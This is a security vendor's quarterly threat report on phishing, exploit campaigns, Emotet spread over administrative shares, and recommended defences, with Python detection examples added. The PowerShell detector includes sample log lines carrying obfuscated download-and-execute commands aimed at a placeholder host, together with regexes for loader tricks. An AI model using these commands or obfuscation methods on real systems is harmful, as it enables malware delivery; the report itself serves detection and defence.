The Q1 2019 Quarterly Threat Report provides a snapshot of threat events and trends investigated by the eSentire Security Operations Center (SOC) in January, February and March of 2019.
Read on to learn what attacks are targeting mid-sized organizations and what strategies you can implement to protect your business.
Hostile Internet Background Radiation
Remote Exploit Campaigns
Anatomy of an Emotet Outbreak
Sandbox Samples Observed
Industry View: Distributed Networks
Takeaways and Recommendations
Malicious Documents (Malware)
eSentire Managed Detection and Response (MDR) is an all-encompassing cybersecurity service that detects and responds to cyberattacks. Using signature, behavioral and anomaly detection capabilities, plus forensic investigation tools and threat intelligence, our Security Operations Center (SOC) analysts hunt, investigate and respond to known and unknown cyberthreats in real-time, 24x7x365.
This report provides a snapshot of events investigated by the eSentire SOC in Q1 2019. It provides visual and data analysis, written analysis, practical recommendations and key assumptions for readers seeking to understand and better respond to the cybersecurity threat landscape.
eSentire’s Threat Intelligence team observed a significant reduction in hostile traffic on the eSentire threat detection surface in the first quarter of 2019 (Figure 1), including malware, phishing and remote exploit attempts (abbreviated to exploits). Leading this contraction was a drop in opportunistic campaigns targeting Microsoft IIS, ThinkPHP, GPON and D-Link. The drop in observed phishing incidents is potentially a result of cybercriminals moving their phishing operations to HTTPS. Some detection signatures rely on the assumption that legitimate services (e.g., Google, Dropbox) do not serve login pages over plain HTTP while phishing sites often do; once a phishing site uses TLS, that class of signature no longer fires. As the security community shifts toward behavioral detection, a smaller share of signature-based coverage remains, which could also contribute to decreased detections.
In addition, the reduction in observed malware incidents was influenced by a decline in coinmining and Kovter. On the other hand, malicious documents (MalDocs) were on the rise through Q1 2019 after a brief hiatus in observations in late December and early January.
Delivery via MalDocs remains the number one observed malware threat to all industries (Figure 2, left). Despite the overall abatement in volumes in Q1 2019 vs. Q4 2018, coinmining still had a significant presence in the mining industry during Q1 (Figure 2, right). However, observed incidents were limited to guest networks and had little impact on these organizations’ ability to function. Construction, healthcare and manufacturing all face numerous challenges in maintaining a secure environment given the mobile and remote nature of construction, the information-sharing requirements of healthcare, and the unique infrastructure required for manufacturing. Mining operations (not to be confused with coinmining) often have remote sites with guest networks for use by employees off hours, which is the primary source of malware observations within the mining industry.
Phishing incidents across eSentire’s customer base were observed mostly in the construction industry, in the form of bank payment lures (Figure 3). Technology, healthcare and mining were also susceptible to phishing, despite fewer incidents in the first quarter. Lures fashioned after Interac, a Canadian bank payment system, were only found in Canadian organizations, while AppleID-focused lures were observed across many countries and industries. Facebook, Microsoft and webmail lures (typically login prompts for Outlook, Gmail and Office 365) were also observed in higher volumes compared to other lures.
Most phishing occurred midweek, which is consistent with previous observations (Figure 4). An interesting new 2019 trend is a shift to Thursday as the least successful workday for phishing. Weekend contributions come from the healthcare, construction and mining industries which tend to have active employees during the weekend due to the nature of their business operations.
One possible explanation for midweek susceptibility is that closer to the weekend employees are in transition and may be more alert or less willing to engage with unfamiliar requests, whereas midweek they may be operating in a more automated fashion. If a reporting process is in place, then when experienced and resilient employees are among the first to receive a phishing email, prompt reporting and mitigation (such as blocking the malicious domain) will reduce the chance of other employees falling victim.
When conducting phishing exercises on employees, it is recommended that companies choose a day when employees are most vulnerable, to ensure that susceptible employees are identified and their behavior corrected. While resilient employees are helpful in real phishing incidents, they also skew the measurement of employee susceptibility during internal phishing tests. To overcome this, employers should test different employees at different times with different lures.
Hostile Internet Background Radiation
Remote exploit attempts are largely unsuccessful in corporate environments but can give an idea of an organization’s external exposure. The biotechnology, accounting and education verticals appeared to have the greatest exposure to opportunistic threats in Q1 2019 (Figure 1, bottom right). In some cases the exposure is necessary, as with public-facing websites. Even when appropriately segmented, businesses may want to monitor such assets for compromise, as any incident has the potential to cause brand damage when not addressed in a timely fashion.
As the vulnerability section below emphasizes, patching can be overwhelming, and without a way to identify and prioritize important patches these largely unsuccessful attacks can become successful. External-facing services with known vulnerabilities are a priority for patching, but eSentire’s Security Operations Center (SOC) has also observed accidental exposure of internal systems that had been left unpatched. Because of the volume and variety of automated remote exploits in the internet background radiation, accidental exposure of a vulnerable asset can quickly lead to compromise. It is recommended that organizations employ robust policies and procedures around network changes and consider services that monitor their external infrastructure. When these preventative controls fail, it is critical that organizations react quickly to identify and address the risk associated with misconfigurations and other errors.
Remote Exploit Campaigns
Many web server exploits that persisted throughout most of 2018 appeared to diminish in February 2019 (Figure 5). Only Microsoft IIS and ThinkPHP were observed in large volumes during Q1 2019. Exploit attempts against web servers and campaigns against home routers decreased in February, with occasional observations of exploits targeting GPON and Shuttletech devices. Updates to detection methodology in March grouped some of this activity under the Mirai user agent category (Figure 5, bottom, red), which is consistent with the injection techniques eSentire observed under the prior rule set. Thus, the Mirai user agent category does not represent a previously unseen attack; it merely classifies known botnets by user agent instead of packet content.
Across clients, vulnerabilities in Microsoft IIS, WebLogic, PHP web applications and the SNMP protocol were observed. In one case, eSentire investigated artifacts from the successful exploitation of an outdated Drupal web server. The investigation revealed several webshells, a file dropper and a backdoor Drupal account, all dropped following successful exploitation of a known Drupal vulnerability. Given the volume of opportunistic exploits and the rapidly expanding threat surface created by new technology, organizations cannot be complacent when addressing known vulnerabilities. Monitoring for post-exploitation indicators of compromise is just one feature of robust vulnerability management.
On average, high and critical severity vulnerabilities existed in about eight percent of externally facing assets across the eSentire Managed Vulnerability Service customer base, with insurance, technology and finance being the most exposed (Figure 6). Outside of the previously discussed Drupal case, eSentire did not observe the successful exploitation of externally facing assets in Q1. The nature and diversity of vulnerabilities varied from industry to industry. For example, technology, finance, business services and healthcare all require a large diversity of services running in their environments. Insurance companies had less diversity in their vulnerabilities. Many vulnerabilities may have mitigations in place that could not be captured in this data.
Analysis of the average weaponization time (the time between the disclosure of a vulnerability and the publication of a related exploit) produces an exponentially decreasing curve, while the number of vulnerabilities with a confirmed public exploit grew (Figure 7). Exploit publication dates are limited to those reported by Exploit-DB. The average is also pulled down when multiple exploits have been published for a single vulnerability, or when a vulnerability is disclosed for which an exploit already exists (yielding a zero or negative interval).
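To make the measurement concrete, the following added example (not eSentire's analysis code; the vulnerability identifiers, disclosure dates and Exploit-DB-style publication dates are constructed) computes the weaponization time per vulnerability from its earliest published exploit, averages it by disclosure year, and shows how the two caveats above, several exploits for one vulnerability and an exploit that predates disclosure, are handled:

```python
"""Weaponization-time analysis over a constructed vulnerability/exploit table.

Added example, not eSentire's code or data. Per vulnerability it measures the
days between disclosure and the FIRST published exploit, then averages per
disclosure year. Two caveats are handled explicitly: several exploits for one
vulnerability (only the earliest counts) and exploits that predate disclosure
(a negative interval, optionally clamped to zero).
"""
from collections import defaultdict
from datetime import date

# Constructed sample data; identifiers and dates are hypothetical.
VULNS = {
    "VULN-2015-001": date(2015, 3, 10),
    "VULN-2016-001": date(2016, 6, 1),
    "VULN-2018-001": date(2018, 9, 20),
    "VULN-2018-002": date(2018, 11, 5),
    "VULN-2019-001": date(2019, 2, 1),   # no public exploit yet
}
EXPLOITS = [  # (vulnerability id, exploit publication date)
    ("VULN-2015-001", date(2015, 9, 6)),
    ("VULN-2015-001", date(2016, 1, 15)),   # second exploit, must not count
    ("VULN-2016-001", date(2016, 8, 30)),
    ("VULN-2018-001", date(2018, 9, 25)),
    ("VULN-2018-002", date(2018, 10, 31)),  # exploit predates disclosure
]


def weaponization_days(vulns, exploits):
    """Return {vuln_id: days} using the earliest exploit per vulnerability.

    Vulnerabilities without a published exploit are omitted. Negative values
    are kept so the caller decides how to treat exploits that predate
    disclosure.
    """
    first = {}
    for vid, published in exploits:
        if vid in vulns and (vid not in first or published < first[vid]):
            first[vid] = published
    return {vid: (pub - vulns[vid]).days for vid, pub in first.items()}


def average_by_year(vulns, exploits, clamp_negative=True):
    """Average weaponization time per disclosure year.

    With clamp_negative=True an exploit that already existed at disclosure
    counts as 0 days (weaponized on day one) instead of pulling the mean
    below zero.
    """
    days = weaponization_days(vulns, exploits)
    buckets = defaultdict(list)
    for vid, d in days.items():
        buckets[vulns[vid].year].append(max(d, 0) if clamp_negative else d)
    return {year: sum(v) / len(v) for year, v in sorted(buckets.items())}


if __name__ == "__main__":
    print(weaponization_days(VULNS, EXPLOITS))
    print(average_by_year(VULNS, EXPLOITS))
    print(average_by_year(VULNS, EXPLOITS, clamp_negative=False))
```

The clamping choice matters for the curve: with real data, a handful of "already weaponized at disclosure" entries can drive a yearly average to zero or below, which reads as "instant weaponization" when it is really a measurement artifact of the exploit source.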
Available vulnerability data shows the count of distinct products with reported vulnerabilities increased by 150 percent between 2015 and 2019. Additionally, the number of individuals or organizations focused on vulnerability research has increased (likely motivated by monetary rewards via bug bounty programs). For example, Google’s Security Research team dominates this data set. In 2018, the Zero Day Initiative reported a record number of vulnerability advisories. Therefore, while the diversity of available products has increased, so has the number of individuals and organizations focused on discovering and reporting vulnerabilities in a responsible manner. While this suggests applications are better secured, the scrutiny from researchers occurs most often after a product is deployed. Thus, the discovery and remediation of vulnerabilities remain a core aspect of good risk management.
Organizations should also be aware of gaps that may not be addressed by regular patching policies. These gaps can arise when researchers become frustrated with vendor responsiveness and publish their research independently of the vendor. A notable example occurred last year when a researcher disclosed a Windows 0-day. In Q1 2019, research and proof-of-concept code for a serious NTLM relay vulnerability in Exchange were published. It took several weeks before official guidance or security updates were released by Microsoft.
Gaps also can arise when serious vulnerabilities are identified in applications or products outside the normal patching scope. An example of this occurred in February with the popular freeware archive tool WinRAR. The vulnerability was disclosed along with proof of concept code and was observed being exploited in the wild just five days after publication. Limiting or restricting unauthorized applications can significantly reduce this risk but may not be feasible due to overhead costs or employee resistance. For example, eSentire found WinRAR present on 40 percent of endpoint customers, suggesting strict application policies are not adopted across the board. Organizations can compensate for this by maintaining an inventory of installed applications or the ability to rapidly retrieve this information from endpoints as needed. Monitoring public sources (such as technical blogs and social media) for relevant information is critical for maintaining a minimal threat surface. There should also be a policy in place for prioritizing and addressing ad-hoc updates when these sources yield actionable information.
Following past trends, Emotet remains the most observed malware threat, followed by Ursnif (Figure 8). Both arrive in malicious documents that rely on victim interaction and abuse built-in features such as Microsoft Office macros and Windows PowerShell. Emotet infections have also been known to spread via mail and via SMB, using administrative shares or the EternalBlue exploit. Because Emotet is a delivery malware, it is often observed as a precursor to financially motivated malware such as ransomware and banking trojans [emopayload]. In one incident in February 2019, eSentire observed Emotet preceding installation of the Trickbot banking trojan. eSentire also observed the use of Mimikatz, a credential-dumping tool used in both penetration testing and malicious activity.
Vagueware is malware that is either poorly classified or not classified at all by antivirus vendors and can sometimes include potentially unwanted programs (PUPs) and adware. Confirmed PUPs and adware are removed from the dataset.
During the first three months of 2019, eSentire observed malicious documents leveraging PowerShell to download and execute malware. PowerShell was a commonly observed execution technique across various malware incidents in Q1, particularly with regard to Emotet and Ursnif, continuing the trend reported in eSentire’s 2018 Annual Threat Report. For Emotet and Ursnif, obfuscation occurs at the command-line level when PowerShell is invoked to download and execute the target payload: the command line is obfuscated using string operations that the Windows command interpreter accepts, and these methods have become increasingly complex (see APPENDIX A). As PowerShell has come under increased scrutiny, threat actors have increased obfuscation complexity in order to evade detection and impede analysis. Technical controls on PowerShell can reduce the risk of infection (see Recommendations). A handful of other execution techniques were observed (Figure 10); most abuse Windows services and powerful administrative tools like PowerShell.
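As an added illustration of the detection problem this creates (example code written for this report, not eSentire's detection logic), the following Python script runs over a few constructed process-creation records in a hypothetical "timestamp|host|parent_image|image|command_line" format. It undoes two layers of obfuscation before pattern matching, the caret escapes that cmd.exe silently strips (so p^o^w^e^r^s^h^e^l^l runs as powershell) and the base64/UTF-16LE -EncodedCommand payload, then flags Office applications spawning a shell and counts loader indicators in the deobfuscated text. Hostnames and the example.invalid URL are placeholders.

```python
"""Detection of obfuscated PowerShell launched from Office documents.

Added example for this report, not eSentire's detection logic. Input is a
CONSTRUCTED process-creation log in a hypothetical
'timestamp|host|parent_image|image|command_line' format.
"""
import base64
import re
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Indicators commonly seen in Emotet/Ursnif-style loader command lines.
INDICATORS = {
    "string_concat": r"'[^']*'\s*\+\s*'",        # 'Down'+'loadStr'+'ing'
    "char_cast": r"\[char\]\s*\d+",               # [char]73+[char]69
    "format_operator": r"\)\s*-f\s",              # ('{0}{1}' -f 'IE','X')
    "invoke_expression": r"\biex\b|invoke-expression",
    "downloader": r"downloadstring|downloadfile|net\.webclient",
    "hidden_window": r"-w(?:indowstyle)?\s+hid",
}


def strip_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape and drops it, so 'p^o^w' runs as 'pow'."""
    return cmdline.replace("^", "")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand/-enc/-e payload, if present.

    PowerShell expects base64 of the UTF-16LE encoded script.
    """
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators(script: str) -> List[str]:
    return [name for name, pat in INDICATORS.items() if re.search(pat, script, re.I)]


def analyze(record: str) -> Dict[str, object]:
    ts, host, parent, image, cmdline = record.split("|", 4)
    parent, image = parent.lower(), image.lower()
    visible = strip_carets(cmdline)
    decoded = decode_encoded_command(visible)
    hits = indicators(visible + " " + (decoded or ""))
    if decoded is not None:
        hits.append("encoded_command")
    office_child = parent in OFFICE_APPS and image in SHELLS
    return {
        "time": ts, "host": host, "office_child": office_child,
        "decoded": decoded, "indicators": hits,
        # Office spawning a shell is suspicious on its own; otherwise require
        # two independent obfuscation/loader indicators to limit false positives.
        "suspicious": office_child or len(hits) >= 2,
    }


def suspicious_hosts(records: List[str]) -> List[str]:
    return [r["host"] for r in map(analyze, records) if r["suspicious"]]


# Constructed records (hypothetical hosts and URL). The encoded payload is
# built here so the sample stays readable and the decoder is exercised.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_RECORDS = [
    "2019-02-05T09:12:01|WS01|explorer.exe|powershell.exe|"
    "powershell.exe -File C:\\scripts\\backup.ps1",
    "2019-02-05T09:14:33|WS07|winword.exe|cmd.exe|"
    "cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -enc " + SAMPLE_ENC,
    "2019-02-05T09:15:02|WS09|svchost.exe|powershell.exe|"
    "powershell -nop -w hidden -c \"$u='Down'+'loadStr'+'ing';"
    "IEX (New-Object Net.WebClient).$u('http://example.invalid/y')\"",
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(analyze(rec))
```

The third record is the important one for the report's point: nothing in its raw command line contains the string "DownloadString", so a signature on that token alone misses it, while the combination of string concatenation, IEX, a WebClient object and a hidden window still gives the analyst a confident verdict.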
Numerous adware and PUP signatures were also detected. While these applications can indicate a certain level of risk in an organization, they are considered consensual, as they are typically the consequence of free internet services. Adware and PUP signatures are therefore removed from the threat data analysis.
The decrease in malware in the first quarter of 2019 corresponded with a lack of detections associated with malicious documents in January, as well as an overall decline in observed coin-miners (Figure 11). Some detections were generic (MalDoc) while others identified the strain of malicious document used (Emotet and Ursnif). Gaps in malicious-document detections coincided with Christmas and Russian Orthodox holidays, as also observed by Cisco and Cofense. A smaller gap in observed malware occurred around Thanksgiving 2018. The lack of detections during holidays is not surprising, given that employees are less likely to be around to open malicious documents. In addition, it is generally accepted that Emotet campaigns are run by operators who have a vacation schedule of their own.
While Emotet appeared to correlate with vacations, coinmining incidents occurred more consistently. This trend follows a peak in coinmining detections in Q4 2018; in the first quarter, the rate of coinmining incidents slowed significantly. Coinmining observations also originate from a different cultural context than Emotet: in the vast majority of cases, the devices were traced to guest networks, implying they were privately owned. Interestingly, coinmining observations were absent during the Thanksgiving break but not during Christmas. Most coinmining incidents occur in non-English-speaking countries, making speculation about holidays more nuanced.
Anatomy of an Emotet Outbreak
In one incident observed by eSentire Threat Intelligence, an Emotet infection was able to spread laterally across the network. In addition to endpoint monitoring, the organization had an antivirus solution in place. However, due to Emotet’s rapid evolution and polymorphic capabilities, the antivirus solution was unable to prevent the malware’s spread throughout the network.
The incident involved a network in which several hosts were out of scope for endpoint monitoring by eSentire. Over a 12-hour period, the out-of-scope machines periodically returned to infect machines in scope, allowing some insight into how Emotet spreads internally. At ground zero, the outbreak was observed spreading to eight hosts from a single source (Figure 12, blue). A few hours later, another source was observed infecting four more machines with a different Emotet payload (Figure 12, grey) followed by the original source reinfecting the same four with the new payload. Several hours later, a third payload was observed spreading to 24 hosts (Figure 12, red).
After collecting all discoverable telemetry, it was discovered more machines were infected. Twelve in the first cluster, seven in the second cluster and 25 in the final cluster. In total, nearly 40 infected machines were observed within, or peripheral to endpoint scope by the end of the 12-hour period. The customer was informed of the systems outside of eSentire’s monitoring scope and actions were taken to remediate and harden the network against future attacks.
For the incident at hand, a lateral outbreak occurred five times in three distinct clusters (Figure 13). For a given cluster, the spread across hosts was rapid. For example, in the first cluster at 12:30 a.m., 10 machines were infected within 12 seconds with the first two machines being infected within the first second (Figure 13).
Emotet has previously been reported spreading through SMB, using the EternalBlue exploit and administrative shares. In this incident, the spread was facilitated through administrative shares using a privileged account or legitimate credentials. Administrative shares (ADMIN$, C$ and IPC$) are created by default on most Windows machines, including servers. Once an attacker has escalated to an administrative account, they will typically have access to these default shares. Disabling them requires setting the AutoShareWks (workstations) or AutoShareServer (servers) value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters in the Windows registry to 0; because some remote-management tooling relies on ADMIN$ and C$, the change should be tested before wide deployment.
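The fan-out pattern described above (one source reaching many hosts over administrative shares within seconds) can be hunted for in share-access logs. The following Python example was added for this report and is not eSentire's detection; it assumes a flat export of Windows Security event 5140 ("A network share object was accessed", which records the logging computer, the source address, the account and the share name) in a hypothetical "timestamp|logging_host|source_ip|account|share" format. The events below are constructed to mirror the ten-hosts-in-twelve-seconds cluster in Figure 13, alongside a legitimate administrator touching two servers minutes apart.

```python
"""Detect one source fanning out over administrative shares (ADMIN$, C$, IPC$).

Added example, not eSentire's code. Input is a CONSTRUCTED, hypothetical flat
export of share-access events (the fields carried by Windows Security event
5140) in the form 'timestamp|logging_host|source_ip|account|share'.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# IPC$ is included because remote service creation (PsExec-style tooling)
# opens it before anything is written to ADMIN$.
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}


def parse(record: str) -> Tuple[datetime, str, str, str, str]:
    ts, host, src, account, share = record.split("|")
    # The share is logged as \\*\ADMIN$; keep only the share name.
    return (datetime.fromisoformat(ts), host, src, account,
            share.rsplit("\\", 1)[-1].upper())


def find_fan_out(records: List[str],
                 window: timedelta = timedelta(seconds=60),
                 min_hosts: int = 5) -> List[Dict[str, object]]:
    """One alert per (source, account) whose admin-share accesses reach at
    least `min_hosts` distinct computers inside any `window`-long span."""
    by_actor: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for rec in records:
        ts, host, src, account, share = parse(rec)
        if share in ADMIN_SHARES:
            by_actor[(src, account)].append((ts, host))

    alerts = []
    for (src, account), events in by_actor.items():
        events.sort()
        best = None
        start = 0
        for end in range(len(events)):           # sliding window over time
            while events[end][0] - events[start][0] > window:
                start += 1
            hosts = {h for _, h in events[start:end + 1]}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best["hosts"])):
                best = {"source": src, "account": account, "hosts": sorted(hosts),
                        "span_seconds": (events[end][0] - events[start][0]).total_seconds()}
        if best:
            alerts.append(best)
    return alerts


# Constructed events: a legitimate admin on two servers, one ordinary file
# share access, then a single source hitting ADMIN$ on ten workstations in 12 s.
SAMPLE_EVENTS = [
    "2019-02-12T00:10:00|FS-01|10.0.1.2|CORP\\jdoe|\\\\*\\C$",
    "2019-02-12T00:25:00|FS-02|10.0.1.2|CORP\\jdoe|\\\\*\\ADMIN$",
    "2019-02-12T00:29:50|FS-01|10.0.5.17|CORP\\svc_backup|\\\\*\\Projects",
] + [
    f"2019-02-12T00:30:{s:02d}|WS-{i:02d}|10.0.5.17|CORP\\svc_backup|\\\\*\\ADMIN$"
    for i, s in enumerate([0, 0, 1, 3, 5, 6, 8, 9, 11, 12], start=1)
]

if __name__ == "__main__":
    for alert in find_fan_out(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are tuning knobs: patch-management and inventory tools legitimately touch ADMIN$ on many hosts, but they do so from a known source and account, which is exactly what the (source, account) key lets you allow-list without blinding the rule to an unexpected actor.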
Organizations that employ a single antivirus solution may have detection gaps, particularly with respect to sophisticated malware such as Emotet. A multi-faceted solution that employs a variety of detection schemes is more likely to detect changes in malware signatures and behavior. The more people there are using antivirus engines, the more data is available for crafting robust detection. Integration of results from various antivirus solutions has been loosely implemented, but format standardization and the interpretation of results remain hurdles.
A consistent observation in tracing the taxonomic variations of malware is that quickly evolving strains like Emotet that find ways to bypass individual endpoint solutions are still often caught by other endpoint solutions. For example, an Emotet sample observed in late March 2019 was only detected by six AV engines out of 54 used by VirusTotal, bypassing the other 48 (Figure 14). Nearly 40 hours later, about half of the implemented AV solutions were able to detect the malware. This leaves a significant window for Emotet to infiltrate organizations, bypass AV and carry out financial or data theft crimes. As a caveat, VirusTotal antivirus configurations aren’t necessarily the same as they would be deployed on an endpoint, however eSentire endpoint analysts have observed Emotet bypassing AV in client environments more than once.
Similar to endpoint and network data (Figure 11), we observed a break in Emotet sandbox samples, during the intersection of North American and European holidays (Figure 15). Upon returning, Emotet was not immediately identified by standard solutions, which labeled it with the generic “Xdoc” marker (Figure 16). Some of these samples were identified by the sandbox as Emotet, while others were identified by less standard antivirus solutions. Some antivirus solutions did not appear to detect a threat at all. Determining the veracity of individual classifier results is a research project in itself. A combination of endpoint monitoring and human analysis can facilitate the detection and response to evasive malware.
Sandbox Samples Observed
Of the sandbox samples observed, the majority were classified as malicious documents, but handfuls of ransomware, infostealers and backdoors were also detected (Figure 17). Some of these may have been the payloads associated with malicious documents observed across the eSentire detection surface.
An increase in sandbox submissions in Q4 2018 may appear to conflict with a decrease observed in endpoint, but these are fundamentally different detection streams and, as noted previously, sandbox submissions may also represent verification checks when other technologies have already detected malware. The surge of ‘Xdoc’ submissions in January would support the narrative that detectors were having a hard time automatically determining the nature of Emotet samples, requiring analysts to make heavier use of the sandbox instance to interpret detection results.
Classification of sandbox samples by malware type and intent reveals a similar distribution as observed on endpoint metrics. Unlike endpoint detections, sandbox samples arrive from a client request. Thus, the sandbox serves as an indicator of human detection. However, the sandbox is also used for verification and research. For example, numerous LockerGoga samples were found in the sandbox, but they were all the result of our research interest. The sandbox also is used for the verification of incidents that may have been detected in endpoint or network solutions. Taxonomic relationships are identified in Figure 18.
Industry View: Distributed Networks
Data gathered from esNETWORK clients showed that industries with more distributed organizations tend toward more malware and phishing incidents (Figure 1, construction and healthcare). The result has implications beyond network topology, extending to the porousness of the social and physical environment in which these businesses operate. For example, construction organizations are distributed across numerous mobile, remote and shared public sites where construction projects are carried out. In addition to the increased threat surface created by devices, there are likely also vulnerabilities in the social structure of these organizations. With teams distributed across different construction sites at different times, the ability to share and reinforce information about phishing incidents and drive-by downloads is diminished. Construction employees spend most of their time with their hands full in a loud, distracting and dangerous environment; it is unlikely that scrutiny of email communications is a high priority under such conditions.
Healthcare faces similar problems. While hospitals and clinics may generally reside in a single location, much of the underlying processes in healthcare rely on an open network. Healthcare institutions must share their network with numerous technical service providers, other healthcare providers, technicians and their own patients. As in construction, healthcare employees use their hands and senses in a demanding, high-stress environment, so effects of decision fatigue and constant attention-to-detail in physical space may lead to reduced alertness once employees sit down in front of a computer. In addition to this, the myriad of partners, patients, technicians and healthcare providers make tracking legitimate communications a demanding task.
To address these deficiencies, it is recommended that construction and healthcare organizations engage in ongoing phishing and web-browsing hygiene awareness training. There should be a process in place for reporting phishing and a way to share real examples of common phishing lures seen in your organization.
Takeaways and Recommendations
Email-Based Attacks (Phishing and Malware)
Email is one of the most common attack vectors observed by eSentire. Reducing this attack surface will protect your organization from phishing and email-borne malware.
- User-awareness training for employees
- Continuous simulated phishing exercises to assess effectiveness
- Share examples of real phishing attempts to target departments in your organization to help employees identify phishing in the future
- Implement a process for reporting and responding to suspicious emails
- Simplify the submission process, e.g., a phishing button
- Identification and removal of malicious emails across employee inboxes:
- Include visibility into instances of end-user URL click-through, program execution and credential submission to facilitate cleanup
- Implement spam filtering
- Implement URL rewrite
- Implement attachment sandboxing
- Only allow email attachments containing trusted file types
- Restrict execution from temp directories, such as AppData
- Implement tagging for external emails
- Enable spoofing protection
- Block or purchase domains similar to your organization’s domain to prevent abuse
Malicious Documents (Malware)
The majority of endpoint infections detected in Q1 2019 leveraged PowerShell and other trusted Windows processes to execute code downloaded from the internet. PowerShell is typically launched from Office documents through CMD.EXE.
- Raise awareness about malicious macros in Office documents. If your organization uses macros legitimately, be sure to present and clarify the different use cases to your employees with examples of both legitimate and malicious documents with macros embedded
- Block macros in Microsoft Office documents that originate from the internet
- Block Office execution from temporary directories such as Outlook and internet browsers
- Set notepad.exe as the default program for scripting file types (.js, .jse, .vbs, .vbe, .wsf, .ps1, etc.) so that a double-click opens the script rather than running it
- Reduce the attack surface associated with PowerShell:
- For Windows 10, consider implementing attack surface reduction rules (for example, blocking Office applications from creating child processes)
- Block outbound network connections from powershell.exe via Windows Firewall
- Prevent downgrade to the PowerShell 2.0 engine, which lacks script-block logging and AMSI support (disable the Windows PowerShell 2.0 optional feature)
- Ensure the Antimalware Scan Interface (AMSI) is enabled so that script content is scanned at execution time, after deobfuscation
- Implement PowerShell script-block logging
- Work with your IT or security department to put a regular patching schedule in place
- Include freeware (such as WinRAR and Notepad++) in patching policies
- Have a process in place to monitor security news and vulnerability announcements and respond with ad hoc patching if needed
- Implement monitoring and detection of asset exposure to external networks
- Consider two-factor authentication for externally facing remote access points
- Ensure default credentials are changed when new technologies are implemented in your environment, especially when those assets are exposed to the internet
eSentire Threat Intelligence used data gathered from over 2,000 proprietary network and host-based detection sensors distributed globally across multiple industries. Raw data was normalized and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a written analytical product.